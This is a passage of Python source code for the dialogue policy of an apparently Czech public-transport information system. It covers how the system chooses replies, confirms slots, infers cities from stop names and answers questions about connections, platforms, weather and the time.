self.ontology.reset_on_change(ds_slot, changed_slot):\n if isinstance(ds[ds_slot], float):\n ds[ds_slot] = 0.0\n elif isinstance(ds[ds_slot], int):\n ds[ds_slot] = 0\n elif isinstance(ds[ds_slot], basestring):\n ds[ds_slot] = \"none\"\n else:\n ds[ds_slot].reset()\n\n self.system_logger.debug(\"Reset on change: {slot} because of {changed_slot}\".format(slot=ds_slot,\n changed_slot=changed_slot))\n break\n\n def filter_iconfirms(self, da):\n \"\"\"Filter implicit confirms if the same information is uttered in an inform\n dialogue act item. Also filter implicit confirms for stop names equaling city names.\n\n :param da: unfiltered dialogue act\n :return: filtered dialogue act\n \"\"\"\n new_da = DialogueAct()\n informs = []\n iconfirms = defaultdict(int)\n\n for dai in da:\n if dai.dat == 'inform':\n informs.append((dai.name, dai.value))\n elif dai.dat == 'iconfirm':\n iconfirms[(dai.name, dai.value)] += 1\n\n for dai in da:\n if dai.dat == 'iconfirm':\n # filter slots explicitly informed\n if (dai.name, dai.value) in informs:\n continue\n # filter repeating iconfirms\n elif iconfirms[dai.name, dai.value] > 1:\n iconfirms[dai.name, dai.value] -= 1\n continue\n # filter mistakenly added iconfirms that have an unset/meaningless value\n elif dai.value is None or dai.value in ['none', '*']:\n continue\n # filter stop names that are the same as city names\n elif dai.name.endswith('_stop'):\n city_dai = dai.name[:-4] + 'city'\n if (city_dai, dai.value) in informs or iconfirms[(city_dai, dai.value)]:\n continue\n\n new_da.append(dai)\n\n return new_da\n\n def get_da(self, dialogue_state):\n \"\"\"The main policy decisions are made here. For each action, some set of conditions must be met. These\n conditions depends on the action.\n\n :param dialogue_state: the belief state provided by the tracker\n :return: a dialogue act - the system action\n \"\"\"\n ludait_prob, last_user_dai_type = dialogue_state[\"ludait\"].mph()\n if ludait_prob < self.policy_cfg['accept_prob_ludait']:\n last_user_dai_type = 'none'\n\n # all slots being requested by the user\n slots_being_requested = dialogue_state.get_slots_being_requested(self.policy_cfg['accept_prob_being_requested'])\n # all slots being confirmed by the user\n slots_being_confirmed = dialogue_state.get_slots_being_confirmed(self.policy_cfg['accept_prob_being_confirmed'])\n # all slots supplied by the user but not implicitly confirmed\n noninformed_slots = dialogue_state.get_slots_being_noninformed(self.policy_cfg['accept_prob_noninformed'])\n # all slots deemed to be accepted\n accepted_slots = dialogue_state.get_accepted_slots(self.accept_prob)\n # all slots that should be confirmed\n slots_tobe_confirmed = dialogue_state.get_slots_tobe_confirmed(self.policy_cfg['confirm_prob'], self.accept_prob)\n # filter out all the slots that are not defined by the ontology to be confirmed\n slots_tobe_confirmed = {k: v for k, v in slots_tobe_confirmed.items() if k in self.ontology.slots_system_confirms()}\n # all slots for which the policy can use ``select`` DAI\n slots_tobe_selected = dialogue_state.get_slots_tobe_selected(self.policy_cfg['select_prob'])\n # filter out all the slots that are not defined by the ontology to be selected\n slots_tobe_selected = {k: v for k, v in slots_tobe_selected.items() if k in self.ontology.slots_system_selects()}\n # all slots changed by a user in the last turn\n changed_slots = dialogue_state.get_changed_slots(self.accept_prob)\n # did the state changed at all?\n has_state_changed = dialogue_state.has_state_changed(self.policy_cfg['min_change_prob'])\n\n if self.debug:\n s = []\n s.append('PTICSHDCPolicy - Slot stats')\n s.append(\"\")\n s.append(\"ludait: %s\" % unicode(last_user_dai_type))\n s.append(\"Slots being requested: %s\" % unicode(slots_being_requested))\n s.append(\"Slots being confirmed: %s\" % unicode(slots_being_confirmed))\n s.append(\"Non-informed slots: %s\" % unicode(noninformed_slots))\n s.append(\"\")\n s.append(\"Accepted slots: %s\" % unicode(accepted_slots))\n s.append(\"Slots to be confirmed: %s\" % unicode(slots_tobe_confirmed))\n s.append(\"Slots to be selected: %s\" % unicode(slots_tobe_selected))\n s.append(\"Changed slots: %s\" % unicode(changed_slots))\n s.append(\"State changed? %s\" % unicode(has_state_changed))\n s = '\\n'.join(s)\n\n self.system_logger.debug(s)\n\n # output DA\n res_da = None\n\n # reset all slots depending on changed slots\n self.reset_on_change(dialogue_state, changed_slots)\n\n # These facts are used in the dialog-controlling conditions that follow.\n # They are named so that the dialog-controlling code is more readable.o\n fact = {\n 'max_turns_exceeded': dialogue_state.turn_number > self.cfg[\n 'PublicTransportInfoCS']['max_turns'],\n 'dialog_begins': len(self.system_das) == 0,\n 'user_did_not_say_anything': last_user_dai_type == \"silence\",\n 'user_said_bye': \"lta_bye\" in accepted_slots,\n 'we_did_not_understand': last_user_dai_type == \"null\" or\n last_user_dai_type == \"other\",\n 'user_wants_help': last_user_dai_type == \"help\",\n 'user_thanked': last_user_dai_type == \"thankyou\",\n 'user_wants_restart': last_user_dai_type == \"restart\",\n 'user_wants_us_to_repeat': last_user_dai_type == \"repeat\",\n 'there_is_something_to_be_selected': bool(slots_tobe_selected),\n 'there_is_something_to_be_confirmed': bool(slots_tobe_confirmed),\n 'user_wants_to_know_the_time': 'current_time' in\n slots_being_requested,\n 'user_wants_to_know_the_weather': dialogue_state[\n 'lta_task'].test('weather', self.accept_prob),\n 'user_wants_to_find_the_platform': dialogue_state[\n 'lta_task'].test('find_platform', self.accept_prob),\n }\n\n\n # topic-independent behavior\n if fact['max_turns_exceeded']:\n # Hang up if the talk has been too long\n res_da = DialogueAct('bye()&inform(toolong=\"true\")')\n\n elif fact['dialog_begins']:\n # NLG(\"Dobrý den. Jak Vám mohu pomoci\")\n res_da = DialogueAct(\"hello()\")\n dialogue_state['lta_task'].set('find_connection', 1.0)\n\n elif fact['user_did_not_say_anything']:\n # at this moment the silence and the explicit null act\n # are treated the same way: NLG(\"\")\n silence_time = dialogue_state['silence_time']\n\n if silence_time > self.cfg['DM']['basic']['silence_timeout']:\n res_da = DialogueAct('inform(silence_timeout=\"true\")')\n else:\n res_da = DialogueAct(\"silence()\")\n dialogue_state[\"ludait\"].reset()\n\n elif fact['user_said_bye']:\n # NLG(\"Na shledanou.\")\n res_da = DialogueAct(\"bye()\")\n dialogue_state[\"ludait\"].reset()\n dialogue_state[\"lta_bye\"].reset()\n\n elif fact['we_did_not_understand']:\n # NLG(\"Sorry, I did not understand. You can say...\")\n res_da = DialogueAct(\"notunderstood()\")\n res_da.extend(self.get_limited_context_help(dialogue_state))\n dialogue_state[\"ludait\"].reset()\n\n elif fact['user_wants_help']:\n # NLG(\"Pomoc.\")\n res_da = DialogueAct(\"help()\")\n dialogue_state[\"ludait\"].reset()\n\n elif fact['user_thanked']:\n # NLG(\"Díky.\")\n res_da = DialogueAct('inform(cordiality=\"true\")&hello()')\n dialogue_state[\"ludait\"].reset()\n\n elif fact['user_wants_restart']:\n # NLG(\"Dobře, zančneme znovu. Jak Vám mohu pomoci?\")\n dialogue_state.restart()\n res_da = DialogueAct(\"restart()&hello()\")\n dialogue_state[\"ludait\"].reset()\n\n elif fact['user_wants_us_to_repeat']:\n # NLG - use the last dialogue act\n res_da = DialogueAct(\"irepeat()\")\n dialogue_state[\"ludait\"].reset()\n\n elif fact['there_is_something_to_be_selected']:\n # implicitly confirm all changed slots\n res_da = self.get_iconfirm_info(changed_slots)\n # select between two values for a slot that is not certain\n res_da.extend(self.select_info(slots_tobe_selected))\n res_da = self.filter_iconfirms(res_da)\n\n elif fact['there_is_something_to_be_confirmed']:\n # implicitly confirm all changed slots\n res_da = self.get_iconfirm_info(changed_slots)\n # confirm all slots that are not certain\n res_da.extend(self.confirm_info(slots_tobe_confirmed))\n res_da = self.filter_iconfirms(res_da)\n\n elif fact['user_wants_to_know_the_time']:\n # Respond to questions about current weather\n # TODO: allow combining with other questions?\n res_da = self.req_current_time()\n\n # topic-dependent\n elif fact['user_wants_to_know_the_weather']:\n # implicitly confirm all changed slots\n res_da = self.get_iconfirm_info(changed_slots)\n\n # talk about weather\n w_da = self.get_weather_res_da(dialogue_state, last_user_dai_type, slots_being_requested, slots_being_confirmed,\n accepted_slots, changed_slots, has_state_changed)\n res_da.extend(w_da)\n res_da = self.filter_iconfirms(res_da)\n elif fact['user_wants_to_find_the_platform']:\n # implicitly confirm all changed slots\n res_da = self.get_iconfirm_info(changed_slots)\n\n # talk about the platform nuber\n da = self.get_platform_res_da(dialogue_state, last_user_dai_type,\n slots_being_requested,\n slots_being_confirmed, accepted_slots,\n changed_slots, has_state_changed)\n res_da.extend(da)\n res_da = self.filter_iconfirms(res_da)\n else:\n # implicitly confirm all changed slots\n res_da = self.get_iconfirm_info(changed_slots)\n # talk about public transport\n t_da = self.get_connection_res_da(dialogue_state, last_user_dai_type, slots_being_requested, slots_being_confirmed,\n accepted_slots, changed_slots, has_state_changed)\n res_da.extend(t_da)\n res_da = self.filter_iconfirms(res_da)\n\n self.last_system_dialogue_act = res_da\n\n # record the system dialogue acts\n self.system_das.append(self.last_system_dialogue_act)\n return self.last_system_dialogue_act\n\n def get_connection_res_da(self, ds, ludait, slots_being_requested, slots_being_confirmed,\n accepted_slots, changed_slots, state_changed):\n \"\"\"Handle the public transport connection dialogue topic.\n\n :param ds: The current dialogue state\n :param slots_being_requested: The slots currently requested by the user\n :rtype: DialogueAct\n \"\"\"\n # output DA\n res_da = None\n\n if ludait == \"reqalts\":\n # NLG(\"There is nothing else in the database.\")\n # NLG(\"The next connection is ...\")\n res_da = self.get_an_alternative(ds)\n ds[\"ludait\"].reset()\n\n elif \"alternative\" in accepted_slots:\n # Search for traffic direction and/or present the requested directions already found\n res_da = self.get_requested_alternative(ds)\n ds[\"alternative\"].reset()\n\n elif slots_being_requested:\n # inform about all requested slots\n res_da = self.get_requested_info(slots_being_requested, ds, accepted_slots)\n\n elif slots_being_confirmed:\n # inform about all slots being confirmed by the user\n res_da = self.get_confirmed_info(slots_being_confirmed, ds, accepted_slots)\n\n else:\n # gather known information about the connection\n req_da, iconfirm_da, conn_info = self.gather_connection_info(ds, accepted_slots)\n if len(req_da) == 0:\n if state_changed:\n # we know everything we need -> start searching\n ds.conn_info = conn_info\n res_da = iconfirm_da\n res_da.extend(self.get_directions(ds, check_conflict=True))\n else:\n res_da = self.backoff_action(ds)\n else:\n res_da = req_da\n\n return res_da\n\n def get_platform_res_da(self, ds, ludait, slots_being_requested,\n slots_being_confirmed, accepted_slots,\n changed_slots, state_changed):\n if slots_being_requested:\n # inform about all requested slots\n res_da = self.get_requested_info(slots_being_requested, ds, accepted_slots)\n\n elif slots_being_confirmed:\n # inform about all slots being confirmed by the user\n res_da = self.get_confirmed_info(slots_being_confirmed, ds, accepted_slots)\n\n else:\n # gather known information about the connection\n req_da, iconfirm_da, platform_info = self.gather_platform_info(ds,\n accepted_slots)\n\n if len(req_da) == 0:\n if state_changed:\n # we know everything we need -> start searching\n res_da = DialogueAct()\n try:\n platform_res = self.directions.get_platform(platform_info)\n\n if not platform_res:\n res_da.append(DialogueActItem('inform', 'platform',\n 'not_found'))\n res_da.append(DialogueActItem('inform', 'direction',\n platform_info.to_stop))\n else:\n if platform_info.directions:\n based_on_directions = 'true'\n else:\n based_on_directions = 'false'\n\n res_da.append(DialogueActItem('inform', 'based_on_directions', based_on_directions))\n\n if platform_res.platform:\n res_da.append(DialogueActItem('inform', 'platform',\n platform_res.platform))\n res_da.append(DialogueActItem('inform', 'track',\n platform_res.track))\n if platform_info.train_name != 'none':\n res_da.append(DialogueActItem('inform',\n 'train_name',\n platform_info.train_name))\n else:\n res_da.append(DialogueActItem('inform', 'direction',\n platform_res.direction))\n else:\n res_da.append(DialogueActItem('inform', 'platform',\n 'none'))\n res_da.append(DialogueActItem('inform', 'track',\n 'none'))\n res_da.append(DialogueActItem('inform', 'direction',\n platform_res.direction))\n except NotSupported:\n res_da.append(DialogueActItem('inform', 'not_supported'))\n else:\n res_da = self.backoff_action(ds)\n else:\n res_da = req_da\n\n return res_da\n\n def get_weather_res_da(self, ds, ludait, slots_being_requested, slots_being_confirmed,\n accepted_slots, changed_slots, state_changed):\n \"\"\"Handle the dialogue about weather.\n\n :param ds: The current dialogue state\n :param slots_being_requested: The slots currently requested by the user\n :rtype: DialogueAct\n \"\"\"\n res_da = None\n if state_changed:\n res_da = self.get_weather(ds)\n else:\n res_da = self.backoff_action(ds)\n return res_da\n\n def get_weather(self, ds):\n \"\"\"Retrieve weather information according to the current dialogue state.\n\n :param ds: The current dialogue state\n :rtype: DialogueAct\n \"\"\"\n # get dialogue state values\n time_abs = ds['time'].mpv()\n time_rel = ds['time_rel'].mpv()\n date_rel = ds['date_rel'].mpv()\n ampm = ds['ampm'].mpv()\n lta_time = ds['lta_time'].mpv()\n in_city = ds['in_city'].mpv()\n\n # return the result\n res_da = DialogueAct()\n\n # default city if no city is set\n if in_city == 'none':\n in_city = self.ontology.get_default_value('in_city')\n res_da.append(DialogueActItem('iconfirm', 'in_city', in_city))\n\n # interpret time\n daily = (time_abs == 'none' and ampm == 'none' and date_rel != 'none' and lta_time != 'time_rel')\n # check if any time is set to distinguish current/prediction\n weather_ts = None\n if time_abs != 'none' or time_rel not in ['none', 'now'] or ampm != 'none' or date_rel != 'none':\n weather_ts, time_type = self.interpret_time(time_abs, ampm, time_rel, date_rel, lta_time)\n # find the coordinates of the city\n city_addinfo = self.ontology['addinfo']['city'].get(in_city, None)\n if city_addinfo:\n # TODO: here we just take the first city of that name. We should do some\n # resolution of cities with the same name in different districts\n lon, lat = city_addinfo[0]['lon'], city_addinfo[0]['lat']\n else:\n lon, lat = None, None\n # request the weather\n weather = self.weather.get_weather(time=weather_ts, daily=daily, city=in_city, lon=lon, lat=lat)\n # check errors\n if weather is None:\n return DialogueAct('apology()&inform(in_city=\"%s\")' % in_city)\n # time\n if weather_ts:\n if time_type == 'rel':\n res_da.append(DialogueActItem('inform', 'time_rel', time_rel))\n else:\n if time_abs != 'none' or ampm != 'none':\n res_da.append(DialogueActItem('inform', 'time',\n '%d:%02d' % (weather_ts.hour, weather_ts.minute)))\n if date_rel != 'none':\n res_da.append(DialogueActItem('inform', 'date_rel', date_rel))\n else:\n res_da.append(DialogueActItem('inform', 'time_rel', 'now'))\n # temperature\n if not daily:\n res_da.append(DialogueActItem('inform', 'temperature', str(weather.temp)))\n else:\n res_da.append(DialogueActItem('inform', 'min_temperature', str(weather.min_temp)))\n res_da.append(DialogueActItem('inform', 'max_temperature', str(weather.max_temp)))\n # weather conditions\n res_da.append(DialogueActItem('inform', 'weather_condition', weather.condition))\n return res_da\n\n def backoff_action(self, ds):\n \"\"\"Generate a random backoff dialogue act in case we don't know what to do.\n\n :param ds: The current dialogue state\n :rtype: DialogueAct\n \"\"\"\n if randbool(10):\n return self.get_limited_context_help(ds)\n elif randbool(9):\n return DialogueAct('reqmore()')\n elif randbool(8):\n return DialogueAct('notunderstood()')\n elif randbool(3):\n return DialogueAct('irepeat()')\n return DialogueAct('silence()')\n\n def get_an_alternative(self, ds):\n \"\"\"Return an alternative route, if there is one, or ask for\n origin stop if there has been no route searching so far.\n\n :param ds: The current dialogue state\n :rtype: DialogueAct\n \"\"\"\n if ds.route_alternative is None:\n return DialogueAct('request(from_stop)')\n else:\n ds.route_alternative += 1\n ds.route_alternative %= len(ds.directions) if ds.directions is not None else 1\n return self.get_directions(ds)\n\n def get_requested_alternative(self, ds):\n \"\"\"Return the requested route (or inform about not finding one).\n\n :param ds: The current dialogue state\n :rtype: DialogueAct\n \"\"\"\n res_da = DialogueAct()\n\n if ds.route_alternative is not None:\n ds_alternative = ds[\"alternative\"].mpv()\n\n if ds_alternative == \"last\":\n res_da.extend(self.get_directions(ds, \"last\"))\n elif ds_alternative == \"next\":\n ds.route_alternative += 1\n try:\n ds.directions[ds.route_alternative]\n res_da.extend(self.get_directions(ds, \"next\"))\n except:\n ds.route_alternative -= 1\n res_da.append(DialogueActItem(\"inform\", \"found_directions\", \"no_next\"))\n\n elif ds_alternative == \"prev\":\n ds.route_alternative -= 1\n\n if ds.route_alternative == -1:\n ds.route_alternative += 1\n res_da.append(DialogueActItem(\"inform\", \"found_directions\", \"no_prev\"))\n else:\n res_da.extend(self.get_directions(ds, \"prev\"))\n\n else:\n ds.route_alternative = int(ds_alternative) - 1\n res_da.extend(self.get_directions(ds))\n\n else:\n res_da.append(DialogueActItem(\"inform\", \"stops_conflict\", \"no_stops\"))\n\n return res_da\n\n def get_requested_info(self, requested_slots, ds, accepted_slots):\n \"\"\"Return a DA containing information about all requested slots.\n\n :param ds: The current dialogue state\n :param requested_slots: A dictionary with keys for all requested \\\n slots and the correct return values.\n :rtype: DialogueAct\n \"\"\"\n res_da = DialogueAct()\n\n for slot in requested_slots:\n # for these, we don't need any route information, we can answer straight away\n if slot not in ['from_stop', 'to_stop',\n 'departure_time', 'departure_time_rel',\n 'arrival_time', 'arrival_time_rel',\n 'duration', 'num_transfers', 'time_transfers', ]:\n dai = DialogueActItem(\"inform\", slot, requested_slots[slot])\n res_da.append(dai)\n # remember that we answered\n ds[\"rh_\" + slot].reset()\n continue\n\n # try to find a route if we don't know it yet\n if ds.route_alternative is None:\n req_da, iconfirm_da, conn_info = self.gather_connection_info(ds, accepted_slots)\n # we have all information we need, start searching\n if len(req_da) == 0:\n ds.conn_info = conn_info\n res_da = iconfirm_da\n # the search will change ds.route_alternative if a route is found\n dir_da = self.get_directions(ds, check_conflict=True)\n # only return the output DAs if no route is found (i.e., the error message),\n # otherwise we go on to return the specific information requested\n if ds.route_alternative is None:\n res_da.extend(dir_da)\n # we don't know enough, ask about the rest\n else:\n res_da = req_da\n\n # we have a route, so return information about it\n # NB: ds.route_alternative might have changed in the meantime if a route has been found\n if ds.route_alternative is not None:\n if slot == 'from_stop':\n res_da.extend(self.req_from_stop(ds))\n elif slot == 'to_stop':\n res_da.extend(self.req_to_stop(ds))\n elif slot == 'departure_time':\n res_da.extend(self.req_departure_time(ds))\n elif slot == 'departure_time_rel':\n res_da.extend(self.req_departure_time_rel(ds))\n elif slot == 'arrival_time':\n res_da.extend(self.req_arrival_time(ds))\n elif slot == 'arrival_time_rel':\n res_da.extend(self.req_arrival_time_rel(ds))\n elif slot in 'duration':\n res_da.extend(self.req_duration(ds))\n elif slot == \"num_transfers\":\n res_da.extend(self.req_num_transfers(ds))\n elif slot == \"time_transfers\":\n res_da.extend(self.req_time_transfers(ds))\n\n # remember that we answered\n ds[\"rh_\" + slot].reset()\n\n return res_da\n\n def get_confirmed_info(self, confirmed_slots, ds, accepted_slots):\n \"\"\"Return a DA containing information about all slots being confirmed\n by the user (confirm/deny).\n\n Update the current dialogue state regarding the information provided.\n\n *WARNING* This confirms only against values in the dialogue state, however, it should (also in some cases)\n confirm against the results obtained from database, e.g. departure_time slot.\n\n :param ds: The current dialogue state\n :param confirmed_slots: A dictionary with keys for all slots \\\n being confirmed, along with their values\n :rtype: DialogueAct\n \"\"\"\n res_da = DialogueAct()\n\n for slot in confirmed_slots:\n if confirmed_slots[slot].mpv() == ds[slot].mpv():\n # it is as user expected\n res_da.append(DialogueActItem(\"affirm\"))\n dai = DialogueActItem(\"inform\", slot, ds[slot].mpv())\n res_da.append(dai)\n else:\n # it is something else than what user expected\n res_da.append(DialogueActItem(\"negate\"))\n dai = DialogueActItem(\"deny\", slot, ds[\"ch_\" + slot].mpv())\n res_da.append(dai)\n\n if slot in accepted_slots:\n dai = DialogueActItem(\"inform\", slot, ds[slot].mpv())\n res_da.append(dai)\n\n ds[\"ch_\" + slot].reset()\n\n return res_da\n\n def confirm_info(self, tobe_confirmed_slots):\n \"\"\"Return a DA containing confirming only one slot from the slot to be confirmed.\n Confirm the slot with the most probable value among all slots to be confirmed.\n\n :param tobe_confirmed_slots: A dictionary with keys for all slots \\\n that should be confirmed, along with their values\n :rtype: DialogueAct\n \"\"\"\n res_da = DialogueAct()\n\n for _, slot in sorted([(h.mpvp(), s) for s, h in tobe_confirmed_slots.items()], reverse=True):\n dai = DialogueActItem(\"confirm\", slot, tobe_confirmed_slots[slot].mpv())\n res_da.append(dai)\n #confirm explicitly only one slot at the time\n break\n return res_da\n\n def select_info(self, tobe_selected_slots):\n \"\"\"Return a DA containing select act for two most probable values of only one slot\n from the slot to be used for select DAI.\n\n :param tobe_selected_slots: A dictionary with keys for all slots \\\n which the two most probable values should be selected\n :rtype: DialogueAct\n \"\"\"\n res_da = DialogueAct()\n\n for slot in tobe_selected_slots:\n val1, val2 = tobe_selected_slots[slot].tmpvs()\n res_da.append(DialogueActItem(\"select\", slot, val1))\n res_da.append(DialogueActItem(\"select\", slot, val2))\n #select values only in one slot at the time\n break\n return res_da\n\n def get_iconfirm_info(self, changed_slots):\n \"\"\"Return a DA containing all needed implicit confirms.\n\n Implicitly confirm all slots provided but not yet confirmed.\n\n This include also slots changed during the conversation.\n\n :param changed_slots: A dictionary with keys for all slots \\\n that have not been implicitly confirmed, along with \\\n their values\n :rtype: DialogueAct\n \"\"\"\n res_da = DialogueAct()\n\n if changed_slots:\n iconf_da = DialogueAct()\n for slot in changed_slots:\n if 'system_iconfirms' in self.ontology['slot_attributes'][slot]:\n dai = DialogueActItem(\"iconfirm\", slot, changed_slots[slot].mpv())\n iconf_da.append(dai)\n res_da.extend(iconf_da)\n return res_da\n\n def get_default_stop_for_city(self, city):\n \"\"\"Return a `default' stop based on the city name (main bus/train station).\n\n :param city: city name (unicode)\n :rtype: unicode\n \"\"\"\n stops = self.ontology.get_compatible_vals('city_stop', city)\n for cand_stop_name in [city, 'Hlavní nádraží', 'CAN, Husova']:\n if cand_stop_name in stops:\n return cand_stop_name\n for cand_stop_suffix in [' hlavní nádraží', ' město', ' střed',\n ', nádraží', ', autobusové stanoviště',\n ', železniční zastávka', ', železniční stanice',\n ', radnice', ', náměstí', ', centrum', ', obec',\n ', náves', ', obecní úřad', ', škola', ', kostel',\n ', rozcestí', ', hostinec']:\n stop = city + cand_stop_suffix\n if stop in stops:\n return stop\n return None\n\n def get_accepted_mpv(self, ds, slot_name, accepted_slots):\n \"\"\"Return a slot's 'mpv()' (most probable value) if the slot is accepted, and\n return 'none' otherwise.\n Also, convert a mpv of '*' to 'none' since we don't know how to interpret it.\n\n :param ds: Dialogue state\n :param slot_name: The name of the slot to query\n :param accepted_slots: The currently accepted slots of the dialogue state\n :rtype: string\n \"\"\"\n val = 'none'\n if slot_name in accepted_slots:\n val = ds[slot_name].mpv()\n if val == '*':\n val = 'none'\n return val\n\n def gather_connection_info(self, ds, accepted_slots):\n \"\"\"Return a DA requesting further information needed to search\n for traffic directions and a dictionary containing the known information.\n Infers city names based on stop names and vice versa.\n\n If the request DA is empty, the search for directions may be commenced immediately.\n\n :param ds: The current dialogue state\n :rtype: DialogueAct, dict\n \"\"\"\n req_da = DialogueAct()\n\n # retrieve the slot variables\n from_stop_val = self.get_accepted_mpv(ds, 'from_stop', accepted_slots)\n to_stop_val = self.get_accepted_mpv(ds, 'to_stop', accepted_slots)\n from_city_val = self.get_accepted_mpv(ds, 'from_city', accepted_slots)\n to_city_val = self.get_accepted_mpv(ds, 'to_city', accepted_slots)\n vehicle_val = self.get_accepted_mpv(ds, 'vehicle', accepted_slots)\n num_transfers_val = self.get_accepted_mpv(ds, 'num_transfers', accepted_slots)\n\n # infer cities based on stops\n from_cities, to_cities = None, None\n stop_city_inferred = False\n if from_stop_val != 'none' and from_city_val == 'none':\n from_cities = self.ontology.get_compatible_vals('stop_city', from_stop_val)\n if len(from_cities) == 1:\n from_city_val = from_cities.pop()\n stop_city_inferred = True\n if to_stop_val != 'none' and to_city_val == 'none':\n to_cities = self.ontology.get_compatible_vals('stop_city', to_stop_val)\n if len(to_cities) == 1:\n to_city_val = to_cities.pop()\n stop_city_inferred = True\n\n # infer cities based on the other\n if from_stop_val != 'none' and from_city_val == 'none' and to_city_val in from_cities:\n from_city_val = to_city_val\n if to_stop_val != 'none' and to_city_val == 'none' and from_city_val in to_cities:\n to_city_val = from_city_val\n if (to_cities is not None and from_cities is not None and\n from_city_val == 'none' and to_city_val == 'none'):\n # more cities for each side of the route -- try to intersect the lists\n intersect = [c for c in from_cities if c in to_cities]\n if len(intersect) == 1:\n from_city_val = intersect.pop()\n to_city_val = from_city_val\n stop_city_inferred = True\n\n # infer stops based on cities (for Google) or add '__ANY__' to avoid further requests (for CRWS)\n if self.infer_default_stops:\n if from_city_val != 'none' and from_stop_val == 'none':\n from_stop_val = self.get_default_stop_for_city(from_city_val)\n if to_city_val != 'none' and to_stop_val == 'none':\n to_stop_val = self.get_default_stop_for_city(to_city_val)\n else:\n if from_city_val != 'none' and from_stop_val == 'none' and (to_city_val == 'none' or\n from_city_val != to_city_val):\n from_stop_val = '__ANY__'\n if to_city_val != 'none' and to_stop_val == 'none' and (from_city_val == 'none' or\n from_city_val != to_city_val):\n to_stop_val = '__ANY__'\n\n # check all state variables and output one request dialogue act\n # once upon a time, request departure time before requesting stops\n if from_stop_val == 'none' and to_stop_val == 'none' and ('departure_time' not in accepted_slots or\n 'time' not in accepted_slots) and randbool(10):\n req_da.extend(DialogueAct('request(departure_time)'))\n\n # we do not know the stops (and they weren't inferred based on cities)\n elif from_stop_val == 'none' or to_stop_val == 'none':\n if from_stop_val == 'none' and to_stop_val == 'none' and randbool(3):\n req_da.extend(DialogueAct(\"request(from_stop)&request(to_stop)\"))\n elif from_stop_val == 'none':\n req_da.extend(DialogueAct(\"request(from_stop)\"))\n elif to_stop_val == 'none':\n req_da.extend(DialogueAct('request(to_stop)'))\n\n # we know the stops, but we need to know the cities -- ask about them\n elif from_city_val == 'none':\n req_da.extend(DialogueAct('request(from_city)'))\n elif to_city_val == 'none':\n req_da.extend(DialogueAct('request(to_city)'))\n\n # generate implicit confirms if we inferred cities and they are not the same for both stops\n iconfirm_da = DialogueAct()\n if stop_city_inferred and len(req_da) == 0 and from_city_val != to_city_val:\n iconfirm_da.append(DialogueActItem('iconfirm', 'to_city', to_city_val))\n iconfirm_da.append(DialogueActItem('iconfirm', 'from_city', from_city_val))\n\n return req_da, iconfirm_da, Travel(from_city=from_city_val, from_stop=from_stop_val,\n to_city=to_city_val, to_stop=to_stop_val,\n vehicle=vehicle_val, max_transfers=num_transfers_val)\n\n def gather_platform_info(self, ds, accepted_slots):\n \"\"\"Return a DA requesting further information for the platform search.\n\n If the request DA is empty there is no need to ask further.\n\n :param ds: The current dialogue state\n :rtype: DialogueAct, DialogueAct, dict\n \"\"\"\n req_da = DialogueAct()\n\n # retrieve the slot variables\n from_stop_val = (ds['from_stop'].mpv() if 'from_stop' in\n accepted_slots else 'none')\n to_stop_val = (ds['to_stop'].mpv() if 'to_stop' in accepted_slots\n else 'none')\n train_name_val = (ds['train_name'].mpv() if 'train_name' in\n accepted_slots else 'none')\n from_city_val = ds['from_city'].mpv() if 'from_city' in accepted_slots else 'none'\n to_city_val = ds['to_city'].mpv() if 'to_city' in accepted_slots else 'none'\n\n if from_stop_val == 'none' and from_city_val == 'none':\n req_da.extend(DialogueAct('request(from_stop)'))\n elif (to_stop_val == 'none' and to_city_val == 'none') and \\\n train_name_val == 'none':\n req_da.extend(DialogueAct('request(to_stop)&request(train_name)'))\n\n # generate implicit confirms if we inferred cities and they are not the same for both stops\n iconfirm_da = DialogueAct()\n\n directions = None\n if ds.directions:\n directions = ds.directions[ds.route_alternative]\n\n pi = PlatformInfo(from_stop=from_stop_val,\n to_stop=to_stop_val,\n from_city=from_city_val,\n to_city=to_city_val,\n train_name=train_name_val,\n directions=directions)\n return req_da, iconfirm_da, pi\n\n def req_current_time(self):\n \"\"\"Generates a dialogue act informing about the current time.\n :rtype: DialogueAct\n \"\"\"\n cur_time = datetime.now()\n return DialogueAct('inform(current_time=%d:%02d)' % (cur_time.hour, cur_time.minute))\n\n def req_from_stop(self, ds):\n \"\"\"Generates a dialogue act informing about the origin stop of the last\n recommended connection.\n\n TODO: this gives too much of information. Maybe it would be worth to split this into more dialogue acts\n and let user ask for all individual pieces of information. The good thing would be that it would lead\n to longer dialogues.\n\n :rtype : DialogueAct\n \"\"\"\n route = ds.directions[ds.route_alternative]\n leg = route.legs[0]\n da = DialogueAct()\n for step in leg.steps:\n if step.travel_mode == step.MODE_TRANSIT:\n da.append(DialogueActItem('inform', 'from_stop', step.departure_stop))\n da.append(DialogueActItem('inform', 'vehicle', step.vehicle))\n da.append(DialogueActItem('inform', 'line', step.line_name))\n da.append(DialogueActItem('inform', 'headsign', step.headsign))\n break\n return da\n\n def req_to_stop(self, ds):\n \"\"\"Return a DA informing about the destination stop of the last\n recommended connection.\n \"\"\"\n route = ds.directions[ds.route_alternative]\n leg = route.legs[0]\n da = DialogueAct()\n for step in reversed(leg.steps):\n if step.travel_mode == step.MODE_TRANSIT:\n da.append(DialogueActItem('inform', 'to_stop', step.arrival_stop))\n break\n return da\n\n def req_departure_time(self, dialogue_state):\n \"\"\"Generates a dialogue act informing about the departure time from the origin stop of the last\n recommended connection.\n\n :rtype : DialogueAct\n \"\"\"\n route = dialogue_state.directions[dialogue_state.route_alternative]\n leg = route.legs[0]\n da = DialogueAct()\n for step in leg.steps:\n if step.travel_mode == step.MODE_TRANSIT:\n da.append(DialogueActItem('inform', 'from_stop', step.departure_stop))\n da.append(DialogueActItem('inform', 'departure_time', step.departure_time.strftime(\"%H:%M\")))\n break\n return da\n\n def req_departure_time_rel(self, dialogue_state):\n \"\"\"Return a DA informing the user about the relative time until the\n last recommended connection departs.\n \"\"\"\n route = dialogue_state.directions[dialogue_state.route_alternative]\n leg = route.legs[0]\n da = DialogueAct()\n for step in leg.steps:\n if step.travel_mode == step.MODE_TRANSIT:\n # construct relative time from now to departure\n now = datetime.now()\n now -= timedelta(seconds=now.second, microseconds=now.microsecond) # floor to minute start\n departure_time_rel = (step.departure_time - now)\n\n # the connection was missed\n if departure_time_rel.days < 0:\n da.append(DialogueActItem('apology'))\n da.append(DialogueActItem('inform', 'missed_connection', 'true'))\n # the connection is right now\n elif departure_time_rel.days == 0 and departure_time_rel.seconds == 0:\n da.append(DialogueActItem('inform', 'departure_time_rel', 'now'))\n # future connections\n else:\n 